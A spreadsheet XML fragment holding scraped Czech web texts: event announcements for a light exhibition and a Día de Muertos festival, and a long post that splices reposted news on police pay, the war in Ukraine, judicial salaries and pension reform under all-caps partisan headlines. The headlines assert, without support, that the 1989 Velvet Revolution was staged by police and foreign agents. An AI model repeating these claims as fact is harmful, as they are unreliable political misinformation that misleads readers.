místech po celé Evropě a těší nás, že mohou přinést radost všem,“ říká Eva Poláčková, majitelka společnosti Decoled . Zveme vás k jedinečnému zážitku Světelná expozice ve Žlutých lázních je příležitostí strávit volný čas netradičně a objevovat ztvárněné krásy vesmíru v klidném prostředí přímo u Vltavy . Výstava je otevřena denně od 1. listopadu 2024 do 31. ledna 2025. „Výstava nabízí možnost krásné zimní procházky na břehu Vltavy v areálu, který je jinak v tomto období zavřený. Zveme všechny, aby si přišli užít spojení s přírodou u zimní řeky, spolu s prohlídkou originálních instalací a vychutnali si třeba rodinný podvečer s vesmírnou atmosférou se sklenicí svařeného vína nebo horké čokolády,“ zve Jan Dell , ředitel areálu Žluté lázně v pražském Podolí . Přijďte se ponořit do fascinujícího světa světla a objevte, jak neuvěřitelně krásný je nekonečný vesmír kolem nás! Foto: Decoled Místo konání: Otevírací doba: Areál Žluté lázně Denně (po-ne) 16-21 hodin Podolské nábřeží 3/1184 140 00 Praha Více informací na: https://svetlavypraveji.cz/praha Světelnou expozici Světla vyprávějí… připravila česká rodinná společnost DECOLED . Již více než čtvrt století zdobí světly města a obce v Česku i zahraničí. Tvoří tematické světelné dekorace obchodních center, vánočních trhů a světelných parků. Vyrábí a prodává vánoční světla a dekorace. Prostě žije Vánoci po celý rok, a to už 27 let. Dana Samková Autor: Redakce Rubrika transition_slide Kultura</t>
  </si>
  <si>
    <t>20241101_399_3242223642_e765f0f255ae07a02bcf.html</t>
  </si>
  <si>
    <t>e765f0f255ae07a02bcf</t>
  </si>
  <si>
    <t>Día de Muertos v Náprstkově muzeu na Betlémském náměstí</t>
  </si>
  <si>
    <t>Día de Muertos v Náprstkově muzeu na Betlémském náměstí Tiskové oznámení k festivalu Día de Muertos Oblíbený mexický festival Día de Muertos (Den mrtvých) se po roce vrací do Náprstkova muzea asijských, afrických a amerických kultur Národního muzea . V sobotu 2. a v neděli 3. listopadu zaplní nádvoří Náprstkova muzea oslavy jednoho z nejdůležitějších svátků, které jsou zapsány na seznamu nehmotného kulturního dědictví UNESCO. Festival, organizovaný ve spolupráci s mexickým kolektivem Día de Muertos a dalšími partnery, přináší do Prahy jedinečnou atmosféru, během které mají návštěvníci příležitost ponořit se do bohaté mexické kultury a tradic. Día de Muertos čili Den mrtvých je v Mexiku jedním z nejdůležitějších svátků doprovázený bujarými oslavami, který vzdává hold předkům a jejich duším. Letošní ročník nabídne pestrý program, který oslavuje hluboké kořeny mexické komunity, a zároveň posiluje kulturní vazby mezi Mexikem a Českou republikou . Návštěvníci se mohou těšit na: Tradiční oltáře (Ofrendas): bohatě zdobené oltáře na počest zesnulých Dílny a rodinné aktivity: zdobení masek, Wixarika korálkové umění, tvoření papel picado a malování na obličej Živá vystoupení: Mariachi hudba, tradiční tance od Mestizo Ballet z Londýna , regionální mexická hudba od Tonalli z Vídně a další Soutěž o nejlepší Catrinu: přijďte oblečeni jako Catrina a soutěžte o výhru Piñatu pro děti: neděle plná zábavy s piñatami pro nejmenší návštěvníky Mexické řemeslníky: ručně vyráběné zboží a tradiční výrobky První den festivalu zakončí veselý fantaskní průvod masek, který se vydá z Betlémského náměstí centrem Prahy až na Staroměstské náměstí , a oslaví život, smrt a ducha komunity. Na akci je vstup zdarma. Program probíhá po celý víkend od 10.00 do 21.30 hodin. Více informací a program naleznete na www.diademuertos.cz. Ke stažení Autor: Národní Muzeum</t>
  </si>
  <si>
    <t>7610</t>
  </si>
  <si>
    <t>6430</t>
  </si>
  <si>
    <t>20241101_4_3264972497_0378a6d7a71c20d6a893.html</t>
  </si>
  <si>
    <t>0378a6d7a71c20d6a893</t>
  </si>
  <si>
    <t>Nový 17. listopad po 17.11.98 Busche, Gorbačova. S policisty, HZS, lékaři, venkovem, Ďurčem, celým národem žádat demisi Fialy, Rakušana. Noví politici Konečná, Turek, Okamura, Šlachta, Maláčová trvat na nové vládě, jako za převratu Buschce, Gorbačova a policistů ČSFR</t>
  </si>
  <si>
    <t xml:space="preserve">Nový 17. listopad po 17.11.98 Busche, Gorbačova. S policisty, HZS , lékaři, venkovem, Ďurčem, celým národem žádat demisi Fialy , Rakušana . Noví politici Konečná, Turek, Okamura, Šlachta, Maláčová trvat na nové vládě, jako za převratu Buschce, Gorbačova a policistů ČSFR Noví politici Konečná, Turek, Maláčová, Okamura, Šlachta, Přáda a další odborníci z různých rezortů navrhnout novou vládu a žádat gen. Pavla o konec vlády Fialy. VELKÉ PROTESTY PROTI FIALOVI, RAKUŠANOVI NA VÁCLAVSKÉM NÁMĚSTÍ , NA LETNÉ . NESKONČIT, DOKUD NEDAJÍ DEMISI A NEBUDE NOVÁ VLÁDA, JAKO ZA HAVLA, BUSCHE, GORBAČOVA 17. LISTOPAD 1989 ORGANIZOVALI POLICISTÉ ČR, SR, AGENTI USA , SSSR JE NEDŮSTOJNÉ, JAK FIALA, RAKUŠAN A SPOL JEDNÁ S POLICISTY, HZS , CELÝM NÁRODEM, SOUDCI, ŽALOBCI NESCHOPNÝ FIALA UŽ NADĚLAL ČR DOST MILIARDOVÝCH DLUHOHŮ Chceme vyšší plat. Policisté a hasiči svolali protest před ministerstvem Unie bezpečnostních složek (UBS) uspořádá 21. listopadu protest před ministerstvem vnitra v Praze . Odbory žádají lepší pracovní a platové podmínky pro policisty, strážníky či hasiče. Nevidí zájem o řešení situace. Ministr vnitra Vít Rakušan minulý týden po jednání se zástupci odborů uvedl, že příslušníkům bezpečnostních sborů by se měl příští rok zvednout plat o 1 500 korun. Odbory nicméně požadují růst o 2 200 Kč. Nespokojení příslušníci bezpečnostních složek budou protestovat před budovou ministerstva vnitra na Letné 21. listopadu od 11:00 do 13:00. „Chceme lepší pracovní a platové podmínky. Chceme respekt, který si zasloužíme,“ uvedla UBS. S výzvou k protestu se kromě policistů či hasičů obrátila také na příslušníky Vězeňské služby, Celní správy a strážníky městských a obecních policií. Část policistů chce už příští týden protestovat také proti nedostatku členů policejního sboru. Protest bude vypadat tak, že hlídky v terénu nebudou ukládat pokuty . Akce podle organizátorů neohrozí bezpečnost lidí. Policisté, kteří se do akce zapojí, chtějí vést protest formou osvěty a lidem problematiku vysvětlovat. „Nikdo se nemusí obávat, že by policisté přestali pracovat. Prvním bodem našeho protestu je, že si nebudeme brát lidi jako rukojmí. Ale věci, které snesou odklad, nebudeme řešit s takovou rychlostí. Takže když nám například někdo nahlásí, že mu ukradli kolo, bude muset chvíli počkat, než na místo dorazíme,“ uvedl místopředseda odborové organizace bezpečnostních sborů Martin Červenka. Nenechat protiprávní jednání bez povšimnutí Policejní prezidium reagovalo, že tomu bránit nebude. Chce ale zajistit, aby chystané protesty nevedly k přehlížení protiprávního jednání. „Zvolená forma protestů je plně v gesci odborových organizací a služební funkcionáři zajistí výkon služby tak, aby v žádném případě nedošlo k jakémukoliv ohrožení z prodlení či k přehlížení páchání protiprávního jednání,“ uvedlo prezidium. „Nepochybujeme o tom, že si jsou naši kolegové a kolegyně vědomi zákonných povinností a že jednou z nich je nenechat bez povšimnutí žádné protiprávní jednání, o kterém se dozví,“ doplnil úřad. Zákony podle něj stanovují konkrétní přestupky, které lze řešit domluvou. Prezidium zároveň upozornilo, že nesleduje počet udělených pokut ani objem vybraných peněz. Příslušníkům bezpečnostních sborů by se měl v příštím roce zvednout plat o 1500 korun ve všech tarifních třídách, řekl začátkem minulého týdne ministr Rakušan . Objem peněz na platy tak oproti letošku stoupne o pět procent. Předseda UBS Aleš Lehký ale novinářům řekl, že požaduje zvýšení o 6,9 procenta, tedy zhruba o 2 200 korun pro každého příslušníka. Vláda o týden dříve rozhodla o zvýšení platů vrcholných politiků a soudců právě o 6,9 procenta. Zvýšení platů o pět procent se původně mělo týkat pouze nejnižších čtyř platových tříd. V páté až osmé třídě platy měly vzrůst o tři procenta, v deváté a desáté třídě o dvě procenta a v nejvyšší platové třídě neměly vzrůst vůbec. V Česku sloužilo k počátku října podle údajů policejního prezidia 40 418 policistů, služebních míst bylo 46 162. Na krajských ředitelstvích bylo 38 303 služebních míst, obsazených jich bylo 34 299. Nejhorší situace je v Karlovarském kraji , kde není obsazena téměř pětina ze 1 402 služebních míst. Okolo 15 procent policistů chybí také na ředitelstvích Libereckého kraje a v hlavním městě. Například v Praze počítá policie s 6 554 služebními místy, obsazeno jich je 5 568. Ve Středočeském kraji chybí 521 policistů ze 4 004 předpokládaných. Nejméně policistů, okolo čtyř procent, chybí při přepočtu na počet míst v Moravskoslezském nebo Olomouckém kraji. X X X MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM X X X BOMBY RUSKA NA KYJEV ZBYTEČNÍ MRTVI, UŽ DÁVNO UKRAJINA MĚLA UDĚLAT DOHODU S RUSKEM Rusko několik hodin nepřetržitě útočí na Kyjev , přibývá požárů a zraněných Ukrajinská metropole Kyjev už od brzkého rána čelí ruskému útoku bezpilotními letouny. Úřady zatím hlásí dva zraněné a několik dopadů trosek sestřelených dronů na domy, píše agentura Reuters. Trosky sestřelených dronů dopadly v šesti částech města, poškodily obytné budovy a auta a způsobily požáry. Hasiči už oheň uhasili. Ve městě jsou slyšet i výbuchy a střelba, obyvatelé Kyjeva se mají schovat do krytů, píše server Ukrajinska pravda. Ukrajinský prezident Volodymyr Zelenskyj dnes ráno informoval na síti Telegram o útocích nejen v Kyjevě , ale také v Poltavské , Sumské a Charkovské oblasti. Vyzval ke zničení výroben a skladů bojových dronů Šáhed a kritizoval „nerozhodnost svobodného světa“ zakročit proti ruským útokům na Ukrajinu . Pozemní ofenziva na Donbase pokračuje Ruské ministerstvo obrany informovalo v pátek o dobytí dalších tří obcí v ukrajinské Doněcké oblasti. Konkrétně hlásí převzetí kontroly nad obcemi Novoukrajinka a Šachtarske, které se nacházejí jižně od města Kurachove , napsal server Meduza. Dále Moskva uvedla, že se zmocnila Leonidivky ležící mezi Doněckem a Bachmutem. Rusko dnes podle agentury TASS také oznámilo, že za uplynulý týden dobylo 12 obcí v Doněcké a Charkovské oblasti. Ruské rakety dnes v Charkově zabily jednoho policistu a tři desítky dalších lidí zranily, uvedl náčelník ukrajinské policie Ivan Vyhivskyj. Mezi nově obsazené obce patří podle dnešního vyjádření ruského ministerstva obrany ukrajinské město Selydove , dále pak obce Hirnyk , Cukuryne, Izmajlivka, Jasna Poljana, Bohojavlenka, Katerynivka, Oleksandropil, Novoukrajinka, Šachtarske a Leonidivka v Doněcké oblasti. Kromě toho si nárokuje kontrolu nad obcí Kruhljakivka, která se nachází u města Kupjansk v Charkovské oblasti na severovýchodě země. Kyjev se k těmto prohlášením Moskvy nevyjádřil. Ukrajinský generální štáb ve své ranní operační svodce píše, že Rusové za poslední den podnikli 170 útoků na ukrajinské pozice, přičemž nejvíce střetů hlásí u Kurachove a ve směru na Pokrovsk. „V kurachovském směru ukrajinské ozbrojené síly odrazily 60 útoků,“ uvedl ukrajinský generální štáb, podle něhož ve směru na Pokrovsk Ukrajinci zastavili 35 ruských útoků. Ukrajinská agentura Unian v pátek napsala, že ruské invazní síly atakují Kurachove z různých stran a zaznamenávají ve svém tažení úspěchy. Postoupit se jim tam podle analytiků z ukrajinského projektu DeepState povedlo u několika obcí. Rusové už delší dobu aktivně postupují v Doněcké oblasti, mimo jiné směrem ke Kurachove, ale zároveň zaznamenávají obrovské ztráty, píše Unian a dodává, že invazní síly doslova srovnávají obce se zemí a poté obsadí ruiny. Server Meduza ve čtvrtek napsal, že po dobytí města Selydove zahájila invazní armáda operaci s cílem obklíčit Kurachove, které web označil jako logistický uzel ukrajinských jednotek v jižní části Donbasu . Ruské síly k městu podle něj postupují ze severu od Selydove, a z jihu od Vuhledaru. Válku na Ukrajině rozpoutalo Rusko 24. února 2022 svým vpádem do země. Ukrajinci nájezd nepřátelských vojsk zčásti odrazili a některá svá území dobyli zpět. Rusové ovšem část východní a jižní Ukrajiny okupují a v poslední době na východě zrychlili postup. Podle nedávné analýzy AFP v říjnu obsadili 478 kilometrů čtverečních ukrajinského území, což je nejvíce od prvních týdnů ruské invaze. Rusové se přibližují nejen ke Kurachove, ale také k většímu logistickému centru Pokrovsku, kterému jsou o něco blíže po dobytí Selydove. Ruské síly během posledního týdne dobyly v Doněcké oblasti okolo dalších 150 kilometrů čtverečních, uvedl šéf estonské vojenské rozvědky plukovník Ants Kiviselg, kterého citoval list Ukrajinska pravda. Podle estonského plukovníka ruské síly pokračují v náporu po celé frontové linii, což nutí ukrajinské jednotky postupně ustupovat, a nelze ani vyloučit, že by ruské jednotky mohly ještě letos na tomto úseku fronty dosáhnout průlomu u Pokrovska, Vuhledaru či Kurachove . Varoval také před možností, že by Rusové mohli své útoky rozšířit i do jižněji položené Záporožské oblasti. Ukrajinská armáda v srpnu pronikla do ruské Kurské oblasti a obsadila část ruského území, kde nyní čelí protiútoku ruských jednotek. Kyjev podle médií mimo jiné doufal, že touto ofenzívou přinutí Moskvu přemístit své jednotky z východu Ukrajiny a zpomalí tam její postup. Tlak ale nepovolil. Dvě ruské rakety zasáhly policejní stanici v centru Charkova na severovýchodě země. Zahynul policejní plukovník Andrij Matvijenko. Dalších 26 policistů a čtyři civilisté utrpěli zranění, napsal na facebooku náčelník ukrajinské policie Vyhivskyj a připomněl, že služba poblíž fronty přináší ohrožení života. Rusové pravděpodobně k ostřelování druhého největšího ukrajinského města použili rakety S-300, dodal list Ukrajinska pravda. X X X MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM X X X Akademici prověří peníze pro rektorčina poradce. Inkasovala je jeho firma Příští pátek by se měli sejít členové akademického senátu Univerzity Karlovy , aby projednali případ možného střetu zájmů, na který upozornila MF DNES. Poradce rektorky a člen kolegia univerzity Otomar Sláma, který má na starosti bezpečnost, totiž zároveň vlastní firmu, jež inkasovala statisíce korun za ostrahu Filozofické fakulty UK. „Předsednictvo Akademického senátu UK vzalo na vědomí informace, které vyšly najevo v návaznosti na zveřejnění článku v deníku MF DNES ze dne 25. října 2024. Předsednictvo se usneslo, že bude svoláno mimořádné zasedání pléna na pátek 8. listopadu s bodem programu – Vyhlášení mimořádné kontroly hospodaření,“ stojí v zápisu z mimořádného zasedání předsednictva senátu, které se uskutečnilo v úterý. Šestnáct z celkem 69 akademiků, kteří zasedají v senátu, požaduje prošetření zakázky. Chtějí znát podrobné údaje o penězích, které univerzita vydala na bezpečnost. Rektorka Milena Králíčková minulý týden nicméně odmítla, že by její poradce Sláma byl ve střetu zájmů. Podle ní pomohla Slámova společnost ve chvíli, kdy byla univerzita v těžké situaci. „Společnost Crowd Safety byla jako jediná z oslovených firem schopna v nejkratším možném termínu, během několika desítek hodin v období blížících se vánočních svátků, zajistit bezpečnostní služby v požadovaném rozsahu. V tu chvíli vnímala a stále vnímá univerzita rychlou pomoc společnosti Crowd Safety jako službu fakultě a univerzitě v kritických chvílích, kterými si od prosince 2023 univerzita procházela,“ napsala MF DNES rektorka Králíčková . Velké firmy byly pomalejší Univerzita dále tvrdí, že další dvě oslovené společnosti, včetně bezpečnostní agentury M2C s miliardovým obratem, nenabídly lepší služby než firma poradce Slámy. Přesné údaje o tom, kolik inkasovala, ale vedení univerzity neposkytlo. V žádosti o informace redakci škola tvrdí, že zpracování odpovědi vyžaduje náročné vyhledávání, které podmiňuje zaplacením 21,5 tisíce korun. Na dotaz na cenu neodpověděl ani samotný Sláma. Akademický senát dle svého jednacího řádu musí kontrolovat hospodaření univerzity. Pravidelně projednává výroční zprávy o hospodaření, má ekonomickou komisi, ale může také iniciovat zvláštní kontrolu. „Předsednictvem pověření členové senátu mají právo seznámit se se všemi skutečnostmi důležitými pro kontrolu,“ uvádí jednací řád. Univerzita hospodaří s 15 miliardami korun ročně. Na příští rok se v rozpočtu ministerstva školství počítá s navýšením peněz na vysoké školy v Česku. Meziročně vzroste rozpočet o 13 procent. V roce 2025 by do veřejných vysokých škol mělo jít 35 miliard korun. Podle ministra školství Mikuláše Beka je to mimořádný meziroční nárůst. X X X V tenisové dotační kauze padla nová obvinění. Stíhaná je i Fléglova manželka V kauze podvodů s tenisovými dotacemi, ve které figuruje bývalý šéf Českého tenisového svazu Ivo Kaderka , padla další obvinění. Policisté nově stíhají také manželku vlivného funkcionáře Vojtěcha Flégla a její dvě firmy. Obviněn byl i spolek Orel Jednota Praha Balkán, přes který skupina podle policie vyváděla státní dotace na účty soukromých firem. O zahájení stíhání dalšího člověka a tří firem informoval minulý týden státní zástupce Ondřej Trčka. Jména obviněných neuvedl. Podle Radiožurnálu jde o Veroniku Fléglovou a firmy Familio a Familio Rehabilitace, v nichž má manželka vlivného tenisového funkcionáře poloviční podíl. Dalším nově obviněným je Fléglem ovládaný spolek Orel Jednota Praha Balkán, přes který podle policie tekly veřejné peníze od svazu na soukromé účty stíhaných. O tom, že v kauze mají padnout nová obvinění, psal iDNES.cz už v září . Důvěryhodné zdroje tehdy redakci řekly, se detektivové nově zabývají hospodařením svazu až do roku 2017. V kauze tenisových dotací je kromě Flégla a dlouholetého šéfa Českého tenisového svazu ( ČTS ) Kaderky obviněná i někdejší šéfka finančního oddělení Hana Baierová, bývalý tajemník svazu Jakub Fastr a trenér Daniel Vacek , který vede reprezentanta Tomáše Macháče . Kaderka a Flégl byli po vypuknutí případu tři měsíce ve vazbě a později na své funkce rezignovali. Oba jsou vyšetřováni na svobodě, trestnou činnost popírají. Kromě jedné obviněné fyzické osoby hrozí všem až desetiletý trest vězení za dotační podvod a způsobení škody velkého rozsahu. X X X SOUDCI VARUJÍ FIALU, PEKAROVOU, VYSTRČILA Jednání se účastnil předseda Nejvyššího soudu Petr Angyalossy , místopředseda Nejvyššího soudu Petr Šuk , nejvyšší státní zástupce Igor Stříž nebo prezident Soudcovské unie Libor Vávra Foto: Veřejná žaloba Nezasahujte do platů v justici neústavním způsobem, vyzvali vládu šéfové soudů i státních zastupitelství Platy soudců a státních zástupců mají být stabilní a předvídatelné. Vláda do jejich výpočtu znovu zasahuje neústavním způsobem, shodli se na čtvrtečním jednání zástupci Justičního grémia. Špičky justice řešily také rozpočtové otázky soudů a státních zastupitelství nebo elektronizaci justice. Vláda nedávno rozhodla, že platy soudců a státních zástupců se příští rok zvýší o 6,95 procenta namísto původně plánovaných 13,7 procenta. Uvedla, že ušetřenou částku, kterou vyčíslila až na 700 milionů korun, hodlá využít na platy administrativních pracovníků v justici. Na Nejvyšším státním zastupitelství se ve čtvrtek sešli v rámci Justičního grémia vrcholní představitelé a představitelky soudů a státního zastupitelství. Setkání se zúčastnili i zástupci Soudcovské unie a Unie státních zástupců. Tématem jednání bylo finanční a materiální zabezpečení chodu soudů a státního zastupitelství a také problematiku elektronizace justice. Justiční grémium se zabývalo otázkami souvisejícími s rozpočtovým krytím všech výdajů soudů a státního zastupitelství souvisejících s plněním jejich povinností. „Z hlediska dlouhodobého zajištění fungování justice na stávající vysoké úrovni považujeme za nezbytné nastavit takový způsob sestavovaní rozpočtů resortu spravedlnosti v příštích letech, který bude odrážet reálné potřeby soudů a státního zastupitelství jak v oblasti odměňování, tak v oblasti dalších výdajů. K tomuto účelu navrhujeme, aby vláda v příštích letech předem projednala příslušné kapitoly státního rozpočtu se zástupci Justičního grémia,“ uvedl za justici předseda Nejvyššího soudu Petr Angyalossy . V souvislosti s projednáním záležitostí souvisejících s platovým ohodnocením odborného justičního personálu vyzvalo Justiční grémium vládu k dodržení dohody o dorovnání objemu finančních prostředků určených na platy administrativy soudů a státního zastupitelství na celorepublikový průměr ve státní sféře v roce 2025. Pro zajištění funkčních informačních systémů a elektronizaci justice je podle soudců a žalobců nezbytné kvalifikované projektové řízení přípravy těchto systémů a stabilní personální kapacity, která bude justiční informační systémy připravovat a spravovat. Nejlépe by to podle zástupců justice bylo cestou specializované servisní organizace. Pravidla mají být stabilní a předvídatelná Dalším bodem, kterým se Justiční grémium na svém jednání zabývalo, byl také současný legislativní návrh vlády na změny v platovém ohodnocení ústavních činitelů. K tomuto bodu přijalo grémium toto stanovisko: „Justiční grémium podobně jako Kolegium předsedů krajských soudů lituje, že vláda opět zamýšlí neorganicky zasáhnout do platů ústavních činitelů. Platové poměry ústavních činitelů mají být podobně jako jiná pravidla fungování ústavních orgánů stabilní a dlouhodobě předvídatelná. Pravidla pro platy všech ústavních činitelů byla před mnoha lety z dobrých důvodů nastavena jako automat odvozený od trojnásobku průměrné mzdy ve státě. Taková úprava, pokud by do ní nebylo neustále ad hoc zasahováno, by poskytovala to, co od ní soudci i jiní ústavní činitelé dlouhodobě žádají – právní jistotu, platovou úroveň odpovídající významu a odpovědnosti daných ústavních funkcí i to, že ústavní činitelé mají mít svůj platový osud spojen s vývojem ekonomiky státu, jemuž slouží. Ve vztahu k soudcům navíc návrh vlády vyvolává s ohledem na dlouhodobou judikaturu Ústavního soudu i judikaturu Soudního dvora EU velmi vážné pochyby o jeho ústavnosti. Právní úprava platů ústavních činitelů jistě může být předmětem zákonné změny. Jí však má předcházet důkladná ústavní a politická debata. Jejím výsledkem má být změna promyšlená a opřená o dostatečně vyjasněné důvody. Takovou debatu však příslušní ústavní aktéři nevedou. Vyzýváme proto vládu, aby právní úpravu platů ústavních činitelů nyní měnila jen způsobem, kterým bude naplněn závazný právní názor Ústavního soudu vyslovený v nálezech z května letošního roku, a v ostatním do platového automatu pro všechny ústavní činitele, odvozeného od trojnásobku průměrné mzdy ve státě, nezasahovala.“ Blažek platy soudců označil za privilegium Kolegium předsedů soudů minulý týden připomnělo, že ÚS jako garant nezávislosti a ochrany právního státu jasně určil, že poslední snížení platů soudců bylo v rozporu s Ústavou. Jakékoliv snahy o revizi tohoto rozhodnutí podkopávají podle kolegia soudní nezávislost. „Politické zásahy do soudcovských platů, které se tváří jako rozpočtové úspory, jsou ve skutečnosti útokem na právní stát a jeho principy,“ napsali šéfové krajských soudů. Jejich stanovisko podpořila i Soudcovská unie. Ta už dříve uvedla, že krok vlády je vědomým porušením nálezu ÚS. Soudce pobouřil výrok ministra spravedlnosti Pavla Blažka. Ten na plénu Poslanecké sněmovny zpochybnil ústavnost rozhodnutí ÚS. „I já se hlásím k tomu, že nepovažuji dosavadní judikaturu Ústavního soudu, pokud jde o platy soudců, za ústavní,“ uvedl Blažek. Jak ministr podotkl, nevadilo by mu, pokud by se Ústavní soud musel znovu zamyslet nad privilegiem soudců. Pokud bere krajský soudce 185 000 korun měsíčně, ministr nepovažuje za porušení jeho nezávislosti, pokud by měl 170 000 korun. „To už není chápání ústavnosti tak, jak si ji dovolím chápat já,“ řekl Blažek. „Poslední nález Ústavního soudu mě vede k tomu, že jsem připravený do takového sporu jít,“ doplnil. Rozhodnutí vlády o růstu platů vrcholných politiků, soudců a státních zástupců o 6,95 procenta v příštím roce soudci opakovaně kritizovali. „Každý pozorovatel si musí klást otázku, zda stát, jehož vláda jde znovu a znovu vědomě proti nálezům Ústavního soudu, je ještě právním státem. Je to nedůstojné a zničující pro právní i politickou kulturu,“ řekl České justici místopředseda Nejvyššího soudu Petr Šuk s tím, že opakované řešení problému se zmrazováním platů soudců a politiků už je „fraškou“. Jako závod ke dnu pak opakované zásahy do soudcovských platů, které jsou navázány na výpočet platů politiků, označil předseda Nejvyššího správního soudu Karel Šimka . (epa), ceskajustice.cz X X X V Německu vstoupil v platnost zákon, který usnadní změnu pohlaví v dokladech V Německu dnes vstoupil v platnost zákon, který mimo jiné umožní transgenderovým či nebinárním osobám změnit úřední zápis o pohlaví bez psychologických posudků a zdlouhavých soudních řízení. Ke změně napříště postačí prohlášení na matričním úřadu. Stejným způsobem lze změnit i křestní jméno. Vládní politici včetně kancléře Olafa Scholze zákon oceňují, z konzervativní a krajně pravicové opozice zní kritika. Podle průzkumu agentury YouGov souhlasí s novým zákonem 47 procent Němců, 37 procent ho ale odmítá. Úřady už přijaly tisíce žádostí o změnu záznamu o pohlaví. Takzvaný zákon o sebeurčení přijal německý Spolkový sněm letos v dubnu. Proti se tehdy stavěly především Alternativa pro Německo (AfD), která je označovaná za pravicově populistickou až krajně pravicovou stranu, ale i někteří členové konzervativní unie CDU/CSU . Tvrdili, že zákon může mít negativní dopad na mládež. Kritici také říkají, že liberalizaci budou moci zneužít kriminálníci k získání nové identity. „Pro mě a ani pro vás se tímto zákonem nic nemění, pokud nebudete chtít. Některým lidem ale můžeme pomoci,“ řekla před hlasováním poslankyně liberálních svobodných demokratů ( FDP ) Katrin Hellingová-Plahrová. Na podporu zákona vystupovala také Nyke Slawiková ze strany Zelených, která byla jednou z prvních osob, které se ve Spolkovém sněmu otevřeně přihlásily k transgenderové identitě. Německý vládní web definuje transgenderové lidi jako osoby, které se neidentifikují s pohlavím, které jim bylo přiřazeno při porodu. Intersexuálové jsou lidé s vrozenými tělesnými znaky, které se nedají z medicínského hlediska přiřadit jednoznačně jen ženskému, nebo jen mužskému pohlaví. Jako nebinární se označují lidé, kteří se neidentifikují ani jako ženy, ani jako muži. Nový právní předpis nahrazuje zákon o transsexualitě z počátku 80. let minulého století a dotkne se především transgenderových, intersexuálních a nebinárních osob. Zásadní změnou oproti dosavadnímu postupu je to, že pro úpravu úředního zápisu o pohlaví již nebudou potřeba dva psychologické posudky, což kritici označovali za ponižující. „Mě se třeba znalec ptal, jestli jsem jako dítě týral zvířata a jestli mě to sexuálně vzrušovalo,“ kritizoval dosavadní praxi v rozhovoru se stanicí WDR 28letý Jonas Brandt, který o změnu úředního záznamu o pohlaví žádal už v minulosti. Odlišné pohlaví Podle nového zákona postačí o přepis jen požádat. Možností je uvést jako pohlaví mužské, ženské, ale také odlišné, které má zahrnovat nebinární či intersexuální osoby. Žadatel může ale nechat kolonku pohlaví i zcela prázdnou. Nehraje přitom žádnou roli, jestli žádající osoba vypadá jako muž, či žena, ale to, s jakým pohlavím se identifikuje. Úřední změna počítá s tříměsíční lhůtou, která má předejít unáhleným rozhodnutím. Někteří zájemci proto svou žádost podali již v srpnu. Zákon obsahuje také roční karenční dobu, po kterou nebude možné podat novou žádost o změnu zápisu. V případě dětí mladších 14 let budou moci žádost podat jejich rodiče, děti musí být ale na úřadu přítomny. Od 14 let mohou žádost podat mladí lidé sami, potřebují ale souhlas zákonné zástupce, který může nahradit rozhodnutí soudu. V obou případech je třeba předchozí schůzka s odborníkem. „ Německo je rozmanité. Proto přizpůsobujeme zákony různým realitám života,“ uvedl k zákonu u příležitosti jeho vstupu v platnost kancléř Olaf Scholz . Podle ministryně pro rodinu, seniory, ženy a mládež Lisy Pausové slouží zákon k „ochraně dlouho diskriminovaných menšin a společensko-politickému pokroku“. „Každý člověk má právo, aby bral stát jeho genderovou identitu v potaz. O toto lidské právo nám jde,“ uvedl ministr spravedlnosti Marco Buschmann . Centrální evidence žádostí neexistuje, podle informací z různých úřadů by jich ale mohly být v první vlně tisíce. Vláda při předložení návrhu zákona počítala se zhruba 4000 žádostmi ročně. Například v Kolíně nad Rýnem , které je největším městem nejlidnatější německé spolkové země Severního Porýní-Vestfálska , podalo žádost zatím kolem 350 lidí, v německém hlavním městě Berlíně je to zhruba 1200. Německo má přes 83 milionů obyvatel. Prohlášením je nově možné změnit i křestní jméno tak, aby odpovídalo genderové identitě. Podle průzkumu agentury YouGov s novým zákonem souhlasí téměř polovina Němců (47 procent), proti se jich vyslovilo 37 procent. Výrazně vyšší byla přitom podpora normy u žen (51 procent). U mužů činila jen 43 procent. Častěji ji také podporují mladší lidé, ceskajustice.cz X X X Když projde osekání náročných profesí, váhal by lidovec s podporou reformy Boj o to, zda by podle návrhu vlády Petra Fialy měli lidé odcházet do penze později než v 65 letech, bude ve Sněmovně pokračovat i příští týden. Opozice se v pátek marně domáhala jasného vyjádření ministra práce a sociálních věcí Mariana Jurečky z KDU-ČSL, jak se lidovečtí poslanci postaví k osekání seznamu náročných profesí o více než 100 tisíc lidí. Tito lidé – například některé zdravotní sestry, skláři či pracovníci v sociálních službách – mají podle dohody lídrů koaličních stran přijít o možnost odejít do předčasného nekráceného důchodu. Důvod, proč Jurečka mlčel, je ten, že všichni poslanci KDU-ČSL pro omezení počtu náročných profesí kvůli důchodové reformě hlasovat nebudou, i když koalice tento týden naznačovala, že se na tom už domluvila. „Osekání náročných profesí určitě nepodpořím. Já se s těmi lidmi setkávám jako lékař, ortoped,“ řekl iDNES.cz poslanec KDU-ČSL, šéf výboru pro sociální politiku, Vít Kaňkovský . Podobný názor má podle více poslanců KDU-ČSL, nikoho ale jmenovat nechtěl Kaňkovský řekl, že nyní váhá, zda podpoří celou reformu, pokud projde pozměňovací návrh, který předložili šéfové poslaneckého klubu TOP 09 Jan Jakob a ODS Marek Benda a který se týká právě náročných profesí. Problém s s tím mají podle informace iDNES.cz hlavně někteří poslanci z výboru pro sociální politiku, kteří tento pozměňovací návrh už ve výboru odmítli. Jasněji bude podle poslance Kaňkovského příští týden ve středu podle výsledku jednání s ministrem financí Zbyňkem Stanjurou z ODS . Od Jurečky chtěly jasné vyjádření, co udělají lidovci, Schillerová i Richterová . Neodpověděl Od ministra a bývalého šéfa lidovců Jurečky chtěly v pátek ve Sněmovně jasné vyjádření, co udělají lidovci, šéfka poslanců ANO Alena Schillerová a místopředsedkyně Sněmovny za Piráty Olga Richterová . „Týká se to 127 tisíc lidí. Návrh ODS a TOP 09 to brutálně osekává,“ řekla Richterová . Její Piráti byli u toho, když se bývalá pětikoalice a pak i vláda po dohodě s odbory shodla na původním, širším seznamu náročných profesí. „Pojďte nám říci, jak bude KDU-ČSL hlasovat o klíčových pozměňovacích návrzích,“ vybízela Jurečku marně Schillerová . Ministr několikrát vystoupil, ale odpovědi na tuto otázku se pečlivě vyhýbal „Já mám informace od předsedů klubů. V úterý prezentovali veřejnosti, že ta dohoda je,“ řekl pouze ve čtvrtek novinářům ve Sněmovně Jurečka . I při odpovědi novinářům se ale pečlivě vyhnul odpovědi, zda upravenou reformu podpoří všichni poslanci KDU-ČSL. Osekání seznamu náročných profesí s 